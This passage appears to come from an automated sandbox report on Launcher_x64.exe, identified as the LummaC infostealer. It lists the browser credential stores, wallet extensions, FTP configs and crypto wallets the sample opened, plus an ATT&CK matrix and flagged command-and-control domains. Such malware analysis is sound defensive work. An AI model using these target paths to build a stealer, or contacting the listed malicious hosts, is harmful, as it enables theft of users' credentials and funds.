                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 3336, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 3336, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		211
                Process Injection                		11
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		211
                Process Injection                		LSASS Memory141
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information                		Security Account Manager11
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS1
                Process Discovery                		Distributed Component Object Model2
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing                		LSA Secrets11
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials33
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Launcher_x64.exe29%ReversingLabsWin32.Infostealer.Generic
                Launcher_x64.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sendypaster.xyz
                		193.143.1.9
                		truetrue
                  		unknown
                  steamcommunity.com
                  		23.55.153.106
                  		truefalse
                    		high
                    lev-tolstoi.com
                    		172.67.157.254
                    		truefalse
                      		high
                      steppriflej.xyz
                      		193.143.1.9
                      		truetrue
                        		unknown
                        supporse-comment.cyou
                        		unknown
                        		unknowntrue
                          		unknown
                          ripe-blade.cyou
                          		unknown
                          		unknowntrue
                            		unknown
                            greywe-snotty.cyou
                            		unknown
                            		unknowntrue
                              		unknown
                              hosue-billowy.cyou
                              		unknown
                              		unknowntrue
                                		unknown
                                bellflamre.click
                                		unknown
                                		unknownfalse
                                  		high
                                  smash-boiling.cyou
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    pollution-raker.cyou
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sendypaster.xyztrue
                                        		unknown
                                        steppriflej.xyztrue
                                          		unknown
                                          smash-boiling.cyoutrue
                                            		unknown
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              ripe-blade.cyoutrue
                                                		unknown
                                                https://lev-tolstoi.com/apifalse
                                                  		high
                                                  greywe-snotty.cyoutrue
                                                    		unknown
                                                    supporse-comment.cyoutrue
                                                      		unknown
                                                      hosue-billowy.cyoutrue
                                                        		unknown
                                                        bellflamre.clickfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabLauncher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.comLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcastsLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Launcher_x64.exe, 00000003.00000003.2503346324.00000000035F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://store.steampowered.com/subscriber_agreement/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEELauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.valvesoftware.com/legal.htmLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.youtube.comLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.comLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLauncher_x64.exe, 00000003.00000003.2503346324.00000000035F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lev-tolstoi.com/piELauncher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englLauncher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://s.ytimg.com;Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://lev-tolstoi.com/eLauncher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
